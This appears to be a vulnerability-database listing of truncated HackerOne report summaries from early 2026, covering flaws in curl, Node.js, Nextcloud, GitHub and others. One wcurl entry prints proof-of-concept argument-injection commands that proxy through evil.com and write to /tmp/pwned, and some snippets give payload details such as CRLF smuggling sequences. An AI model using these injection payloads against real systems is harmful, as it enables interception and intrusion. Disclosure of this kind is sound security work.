
15369 matches found

Hacker One, added 2026/02/10 1:35 p.m. (12 views)

Monero: Inverted ternary in peerlist_manager::filter() allows unlimited whitelist entries per host via different ports

The peerlist_manager::filter function in the Monero project's p2p/net_peerlist.h file contained an incorrect ternary operator that operated on the wrong peer list. When called with 'white=true', it filtered the gray list instead of the white list. As a result, a single host could accumulate unlimit...

AI score: 5.8, Exploits: 0

Hacker One, added 2026/02/09 8:44 p.m. (12 views)

Node.js: Assertion error in node_url.cc via malformed URL format leads to Node.js crash

An assertion error in node_url.cc via malformed URL format leads to a Node.js crash. A flaw in the URL processing caused an assertion failure in the native code when url.format was called with a malformed internationalized domain name containing invalid characters, crashing the Node.js process. Th...

CVSS: 5.7, AI score: 6.3, EPSS: 0.00325, Exploits: 0

Hacker One, added 2026/02/07 3:59 p.m. (10 views)

Basecamp: Improper Access Control in `fizzy.do` import flow allows cross-tenant ActionText reference resolution and data disclosure

The vulnerability allowed for cross-tenant ActionText reference resolution and data disclosure during the account import flow. The import process did not properly verify the ownership of the referenced records before minting signed global IDs, enabling an attacker to access and disclose data from...

AI score: 5.8, Exploits: 0

Hacker One, added 2026/02/06 9:22 p.m. (14 views)

RubyGems: Server-side ReDoS via user-controlled regex in OIDC Access Policy

The OIDC Access Policy implementation evaluated user-supplied regular expressions against JWT claim values using Ruby's Regexp engine without any timeout or complexity validation. The vulnerable code path was Regexp.new(value).match?(claimvalue), where value was fully user-controlled and claimvalue w...

AI score: 5.8, Exploits: 0

Hacker One, added 2026/02/01 1:35 p.m. (17 views)

Node.js: Timing side-channel in HMAC verification via memcmp() in crypto_hmac.cc leads to potential MAC forgery

Vulnerability description not provided...

CVSS: 5.9, AI score: 6.2, EPSS: 0.00385, Exploits: 0

Hacker One, added 2026/01/30 2:35 p.m. (10 views)

Node.js: Memory leak in Node.js HTTP/2 server via WINDOW_UPDATE on stream 0 leads to resource exhaustion

Vulnerability description not provided...

CVSS: 5.3, AI score: 6.2, EPSS: 0.00454, Exploits: 0

Hacker One, added 2026/01/30 7:05 a.m. (43 views)

curl: MQTT Protocol Packet Injection via Unchecked CONNACK Remaining Length

I'm not sure if this is a vulnerability or intended behavior, but I noticed that curl's MQTT implementation accepts CONNACK packets with Remaining Length values greater than 2, which appears to violate the MQTT v3.1.1 specification. According to the MQTT spec, CONNACK packets should have a Remainin...

AI score: 5.9, Exploits: 0

Hacker One, added 2026/01/27 11:26 p.m. (17 views)

GitHub: Add labels to arbitrary issues/PRs & compromise GitHub Actions label checks

A vulnerability was identified that allowed a user with read access to a repository and write access to a project to modify issue and pull request metadata through the project. When adding an item to a project that already existed, column value updates were applied without verifying the actor's...

CVSS: 5.3, AI score: 5.8, EPSS: 0.00321, Exploits: 0

Hacker One, added 2026/01/26 11:03 a.m. (10 views)

Fastify: DoS via Unbounded Memory Allocation in sendWebStream on Fastify v5.7.0+ leads to OOM crash when backpressure is ignored

A vulnerability was discovered in Fastify versions 5.7.0 and later. The issue was in the "sendWebStream" function, which failed to handle TCP backpressure correctly. When a ReadableStream was sent as a response, Fastify continuously pulled data from the stream producer and wrote it to the respons...

CVSS: 3.7, AI score: 5.9, EPSS: 0.00488, Exploits: 0

Hacker One, added 2026/01/25 4:20 p.m. (36 views)

curl: wcurl Argument Injection via Unquoted Variable

When I was code auditing curl I stumbled upon a vulnerability that was on wcurl. Affected version: current. Step 1: open terminal. Step 2: run PoCs below: wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o...

AI score: 6, Exploits: 0

Hacker One, added 2026/01/25 11:41 a.m. (10 views)

Tucows (VDP): Password Strength Policy Bypass via Server-Side Validation Flaw

A password strength policy bypass was discovered due to a server-side validation flaw. The password strength policy was only enforced in the browser, not on the server side...

AI score: 5.9, Exploits: 0

Hacker One, added 2026/01/25 12:02 a.m. (17 views)

curl: Integer Underflow in src/var.c

Summary: A potential Integer Underflow vulnerability was identified in the setvariable function within src/var.c. The flaw occurs during the calculation of the variable content length (clen) when a byte range is specified. Specifically, the code fails to validate if startoffset is greater than...

AI score: 5.9, Exploits: 0

Hacker One, added 2026/01/23 7:13 p.m. (15 views)

GitHub: PATs without the required scope can leak issues

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token (PAT) lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

CVSS: 5.3, AI score: 5.8, EPSS: 0.00248, Exploits: 0

Hacker One, added 2026/01/23 4:07 a.m. (11 views)

Nextcloud: View-only guests could see deleted Collectives pages in the trashbin

A vulnerability was discovered where view-only guests could see deleted Collectives pages in the trashbin...

CVSS: 2.6, AI score: 5.8, EPSS: 0.00189, Exploits: 0

Hacker One, added 2026/01/21 3:07 a.m. (10 views)

Nextcloud: IDOR on ██████ via direct photo URL leads to unauthorized access to deleted and other users' photos

Summary: An Insecure Direct Object Reference (IDOR) vulnerability exists in the application that allows unauthorized access to photos belonging to other users. The application does not properly validate whether the logged-in user is authorized to access a photo when accessing it via direct URL. Thi...

AI score: 5.9, Exploits: 0

Hacker One, added 2026/01/20 9:29 p.m. (10 views)

Weblate: Argument Injection in /manage/ssh/ via host parameter leads to sensitive file disclosure on Weblate

A vulnerability was discovered in the SSH management interface of Weblate, a web-based translation tool. The vulnerability allowed an attacker with administrative privileges to inject command-line arguments into the host parameter, leading to sensitive file disclosure on the server. The vulnerabl...

CVSS: 9.1, AI score: 5.4, EPSS: 0.00447, Exploits: 3

Hacker One, added 2026/01/19 8:10 p.m. (57 views)

curl: SSL options ISSUERCERT, EC_CURVES and CRLFILE silently ignored by non-OpenSSL backends

Summary: The SSL options ISSUERCERT, EC_CURVES and CRLFILE are silently ignored for e.g. the mbedTLS backend, which allows MITM attacks for the ISSUERCERT and CRLFILE bug, and can reduce the security and compliance by ignoring the specified curve for the EC_CURVES bug. Affected version: Tested with...

AI score: 5.8, Exploits: 0

Hacker One, added 2026/01/19 6:46 p.m. (27 views)

curl: Cross-origin cookies leak and injection risk when using a custom Host header

Summary: When a custom hostname is specified, it is used for cookie matching if the cookie engine is also enabled for this transfer. This matching persists in cross-origin redirects even though the originally supplied hostname is removed. cookiehost is set from a custom Host header: lib/http.c...

AI score: 5.7, Exploits: 0

Hacker One, added 2026/01/19 10:27 a.m. (26 views)

curl: Cookie Replacement Use-After-Free Vulnerability

Summary: The cookie replacement logic in lib/cookie.c contains a use-after-free vulnerability in the replace_existing function. The function modifies a linked list while iterating over it, creating potential for memory corruption in concurrent or complex cookie operations. Vulnerable Code Location...

AI score: 6.1, Exploits: 0

Hacker One, added 2026/01/19 10:12 a.m. (14 views)

curl: Cookie Max-Age Integer Overflow Vulnerability

Summary: The cookie parsing code in lib/cookie.c contains an integer overflow vulnerability when processing the Max-Age attribute of HTTP cookies. The vulnerable code attempts to add the max-age value to the current timestamp without adequate overflow protection. While the code includes an overflo...

AI score: 5.7, Exploits: 0

Hacker One, added 2026/01/17 11:59 a.m. (20 views)

Sony: Improper State Validation on Sony WH-CH520 via BLE Command Service leads to unauthorized Bluetooth pairing and audio hijacking

A vulnerability was discovered in the firmware of the Sony WH-CH520 headset. The vulnerability allowed an unauthenticated write to a proprietary Sony command service via Bluetooth Low Energy (BLE), causing the device to become discoverable and accept a standard Bluetooth Security Manager Protocol S...

CVSS: 7.1, AI score: 5.5, EPSS: 0.06942, Exploits: 14

Hacker One, added 2026/01/17 7:52 a.m. (40 views)

curl: libcurl: Improper Authentication State Management on Cross-Protocol Redirects

Following the recent advisory for CVE-2025-14524, I conducted an investigation into how libcurl manages OAuth2 credentials during complex redirect chains. I have confirmed that while the library successfully protects traditional user credentials, it fails to clear OAuth2 Bearer tokens in the same...

CVSS: 5.7, AI score: 7.4, EPSS: 0.01595, Exploits: 2

Hacker One, added 2026/01/17 3:04 a.m. (16 views)

AWS VDP: Password Reuse Vulnerability on AWS Sign-in Page via Password Reset Flow leads to Security Policy Violation

Asset URL: ██████ Summary: The AWS sign-in page allows users to reuse old passwords when resetting their password, which violates security best practices outlined in OWASP Authentication Cheat Sheet and NIST 800-63B Digital Identity Guidelines. This misconfiguration could potentially weaken accou...

AI score: 5.6, Exploits: 0

Hacker One, added 2026/01/16 4:43 a.m. (12 views)

Nextcloud: Private circle can be added to another circle via API despite visibility restriction

A vulnerability was discovered where private circles could be added to other circles via the API, despite visibility restrictions...

CVSS: 2.6, AI score: 5.8, EPSS: 0.002, Exploits: 0

Hacker One, added 2026/01/15 10:00 p.m. (11 views)

Node.js: HashDoS in V8

Vulnerability description not provided...

CVSS: 5.9, AI score: 6.5, EPSS: 0.00283, Exploits: 0

Hacker One, added 2026/01/14 3:27 p.m. (16 views)

Cosmos: Memory Exhaustion in CometBFT v1.0.1 via malicious ProposalMessage leads to network-wide denial of service

Summary of Impact: CometBFT v1.0.1 contains a critical memory exhaustion vulnerability that allows any peer to crash nodes with a single 50-byte P2P message. An attacker can send a malicious ProposalMessage with PartSetHeader.Total set to 2^32-1, causing the receiving node to immediately allocate...

AI score: 6, Exploits: 0

Hacker One, added 2026/01/14 5:02 a.m. (27 views)

GoCD: Information Disclosure via Logback Configuration Injection in GoCD Agent

Summary: The GoCD Agent's logging mechanism (Logback) allows for property substitution and custom configuration loading. By default, the config directory might not exist in the installation path. However, if an attacker creates this directory and places a specially crafted agent-launcher-logback.xml...

AI score: 5.6, Exploits: 0

Hacker One, added 2026/01/13 9:02 p.m. (23 views)

curl: Directory listing vulnerability is disclosing names and emails, widespread (thousands of records, publicly accessible without auth)

Summary: A directory listing vulnerability is disclosing names, emails and much other sensitive information, which significantly increases the severity because these are considered PII (Personally Identifiable Information). Thousands of records, publicly accessible without auth, also can be...

AI score: 6.7, Exploits: 0

Hacker One, added 2026/01/13 8:07 p.m. (12 views)

curl: IMAP Protocol Desynchronization and Response Smuggling via Naive Literal Parsing

libcurl incorrectly parses IMAP literal sizes even when they are embedded within quoted strings (e.g., email subjects or headers). This behavior violates RFC 3501, which mandates that content inside double quotes must be treated as opaque text. This parsing error causes the client state machine to...

AI score: 7, Exploits: 0

Hacker One, added 2026/01/13 2:31 p.m. (14 views)

curl: MQTT: unsigned integer underflow bypasses MAX_MQTT_MESSAGE_SIZE check

Summary: An unsigned integer underflow exists in libcurl's MQTT publish path. Due to incorrect arithmetic ordering in the size validation logic, oversized MQTT PUBLISH messages are not rejected as intended. Affected version: libcurl 8.18.0. Tested on macOS arm64 with AddressSanitizer enabled. Steps ...

AI score: 7.3, Exploits: 0

Hacker One, added 2026/01/13 1:30 p.m. (18 views)

curl: Digest Authentication Header Injection

Summary: The Digest authentication implementation in libcurl fails to properly escape the uri parameter in the Authorization header. While other parameters like username, realm, and nonce are correctly escaped using auth_digest_string_quoted, the uri is inserted raw into the header. This allows an...

AI score: 7.5, Exploits: 0

Hacker One, added 2026/01/13 1:16 p.m. (15 views)

curl: Gopher Protocol Command Injection (SSRF Smuggling)

Summary: The curl Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to "smuggle" additional Gopher selectors or arbitrary commands into a single Gopher request. By using %0d%0a in the URL, an attacker can break the...

AI score: 8.1, Exploits: 0

Hacker One, added 2026/01/13 11:39 a.m. (14 views)

curl: Use-After-Free in curl_easy_nextheader when reusing header handle across requests

The API returns struct curl_header objects that internally reference libcurl-owned linked list nodes. When a new request is performed on the same CURL handle, libcurl frees and rebuilds the internal header list, but previously returned struct curl_header objects remain valid to the application an...

AI score: 7.8, Exploits: 0

Hacker One, added 2026/01/13 7:12 a.m. (14 views)

curl: Integer Overflow in MQTT Protocol Handling Allows Bypassing Message Size Limit

Summary: A logic error involving an integer overflow (specifically, an unsigned integer underflow) exists in the lib/mqtt.c file within the mqtt_publish function. This vulnerability allows an attacker or a malicious user configuration to bypass the explicit MAX_MQTT_MESSAGE_SIZE check. The vulnerabilit...

AI score: 7.3, Exploits: 0

Hacker One, added 2026/01/13 12:50 a.m. (18 views)

curl: Integer-underflow leads to heap over-read in TFTP implementation

libcurl on commit 3ee1d3b573e6ea36fb478dbd0d9913483b900928 contains a vulnerability in its TFTP implementation that can cause curl or a libcurl-user to send heap memory beyond the bounds of an allocated chunk to a malicious TFTP server. The vulnerability lies in lib/tftp.c, in function...

AI score: 6.8, Exploits: 0

Hacker One, added 2026/01/12 2:25 a.m. (8 views)

MetaMask: Authorization Bypass in Starknet Snap via enableAuthorize parameter leads to unauthorized transaction signing

A critical security vulnerability was discovered in the Starknet Snap by Consensys. The vulnerability allowed malicious websites to bypass user authorization when signing messages or transactions. The vulnerability existed in the enableAuthorize parameter, which could be controlled by any website...

AI score: 5.6, Exploits: 0

Hacker One, added 2026/01/10 7:52 p.m. (8 views)

GitHub: Missing Access Control in MigrationFile allows attacker to upload files to any Migration

A Missing Authorization vulnerability was identified in GitHub Enterprise Server that allowed unauthorized content to be uploaded to a user's repository migration export due to a missing authorization check in the repository migration upload endpoint. The vulnerability could be exploited by...

CVSS: 6.5, AI score: 5.9, EPSS: 0.0039, Exploits: 0

Hacker One, added 2026/01/10 7:22 p.m. (27 views)

curl: Heap Out-of-Bounds Read in lib/http2.c via Malformed PUSH_PROMISE Headers

Summary: A heap-based out-of-bounds read vulnerability exists in libcurl's HTTP/2 implementation. The on_header callback in lib/http2.c incorrectly treats header names and values provided by nghttp2 as null-terminated C-strings. Specifically, passing these pointers to curl_maprintf with the %s forma...

AI score: 7.5, Exploits: 0

Hacker One, added 2026/01/10 6:58 a.m. (18 views)

curl: CRLF Injection in HTTP header values allows arbitrary header injection

curl allows carriage return (\r) and line feed (\n) characters inside HTTP header values. When attacker-controlled data is used in a header value (e.g., Authorization: Bearer ...), curl constructs and sends a malformed HTTP request containing injected headers. This violates HTTP specification RFC 7320 /RFC...

AI score: 6.7, Exploits: 0

Hacker One, added 2026/01/08 8:38 a.m. (16 views)

curl: Inconsistent Rejection Logic in file:// URLs with Authority

curl's file:// protocol handler inconsistently applies path sanitization. It rejects file://../ as "Bad file:// URL" but allows the same traversal when an authority/host (e.g., localhost) is present (file://localhost/../). This inconsistency misleads developers who rely on the bad file:// URL error for...

AI score: 7.2, Exploits: 0

Hacker One, added 2026/01/07 10:12 p.m. (16 views)

curl: Stack Buffer Overflow in mprintf.c formatting function (fallback path)

Summary: A stack-based buffer overflow exists in mprintf.c within the outdouble function. This vulnerability affects builds where HAVE_SNPRINTF is undefined, forcing the use of the legacy sprintf function. The logic responsible for calculating the maximum safe precision (maxprec) for floating-point...

AI score: 7.2, Exploits: 0

Hacker One, added 2026/01/07 8:44 a.m. (11 views)

Nextcloud: Authentication Bypass in ID4me handling via Missing JWT Signature Verification in User OIDC

An authentication bypass vulnerability was discovered in the ID4me handling in the OIDC implementation. The vulnerability was caused by missing JWT signature verification for user authentication...

CVSS: 8.1, AI score: 5.5, EPSS: 0.00329, Exploits: 1

Hacker One, added 2026/01/06 8:51 a.m. (14 views)

curl: MQTT: Missing upper bound on incoming Remaining Length allows server-controlled long wait

Curl's MQTT implementation accepts any valid Remaining Length advertised by the server without an explicit upper bound beyond the MQTT spec maximum of 268,435,455 bytes. A malicious server can send a PUBLISH packet claiming this maximum size but provide only minimal payload, causing curl to wait...

AI score: 6.8, Exploits: 0

Hacker One, added 2026/01/05 10:13 p.m. (15 views)

curl: State Isolation Failure in Multiplexed Connections (Shared Auth Context)

Vulnerability: State Isolation Failure in Multiplexed Connections (Shared Auth Context). Product: libcurl. Affected Versions: v7.43.0 - Current v8.x - All versions supporting HTTP/2 Multiplexing. Severity: CRITICAL. CVSS: 9.1. 1. Executive Summary: A fundamental design flaw exists in libcurl's state...

AI score: 6.7, Exploits: 0

Hacker One, added 2026/01/04 6:34 p.m. (10 views)

Nextcloud: SVG filter primitives bypass remote image blocking, enabling email tracking without consent.

A vulnerability was discovered in the HTML sanitizer of the Roundcube webmail application. The sanitizer did not properly handle the SVG filter primitive, allowing external resources to be loaded even when the "Block remote images" setting was enabled. This vulnerability could be used to track...

AI score: 5.8, Exploits: 0

Hacker One, added 2026/01/03 6:59 p.m. (24 views)

curl: Path Traversal in curl file:// Protocol Handler Allows Unauthorized File Access

Summary: During my manual review of the file path handling logic in curl's source code, I noticed the absence of proper validation for directory traversal sequences, which I then verified through practical testing. I discovered that curl allows unauthorized access to arbitrary files through the...

CVSS: 8.1, AI score: 8.2, EPSS: 0.60122, Exploits: 1

Hacker One, added 2026/01/03 4:31 p.m. (16 views)

curl: Alt-Svc bypasses credential leak protection (CVE-2018-1000007)

Summary: I found a bug where curl's Alt-Svc implementation fails to strip sensitive authentication headers (Authorization and Cookies) when remapping a connection to a different host or port. This essentially bypasses the security fix for CVE-2018-1000007. While auditing the code, I noticed that...

CVSS: 9.8, AI score: 7.8, EPSS: 0.08031, Exploits: 0

Hacker One, added 2026/01/03 2:38 a.m. (5 views)

8x8: jitsi-call-analytics: Unauthenticated arbitrary file write via path traversal in `/api/v1/uploads/analyze`

A path traversal vulnerability was discovered in the /api/v1/uploads/analyze endpoint of the jitsi-call-analytics backend. The vulnerability allowed unauthenticated users to write files within the configured RTCSTATSDOWNLOADSPATH directory. The issue was caused by the upload handler using...

AI score: 5.8, Exploits: 0

Hacker One, added 2026/01/02 5:54 a.m. (15 views)

curl: CRLF Injection in Gopher Protocol (`lib/gopher.c`)

Control characters slip through during URL handling in curl's Gopher setup. Though null bytes get blocked by the REJECT_ZERO setting, returns and line feeds remain permitted. A specially built address using percent-encoded breaks - like %0D%0A - opens room for command insertion. Because of how...

AI score: 7.2, Exploits: 0

Hacker One, added 2026/01/02 1:51 a.m. (19 views)

curl: HTTP Request Smuggling and SSRF via CRLF Injection in Curl_add_custom_headers

Summary: A lack of CRLF validation in Curl_add_custom_headers at lib/http.c:1761 allows users to inject arbitrary HTTP headers. This violation of RFC 7230 §3.2.4 leads to HTTP Request Smuggling and potential SSRF bypass. AI Disclosure: I utilized an AI assistant to aid in the initial code analysis a...

AI score: 7.2, Exploits: 0

Total number of security vulnerabilities: 15369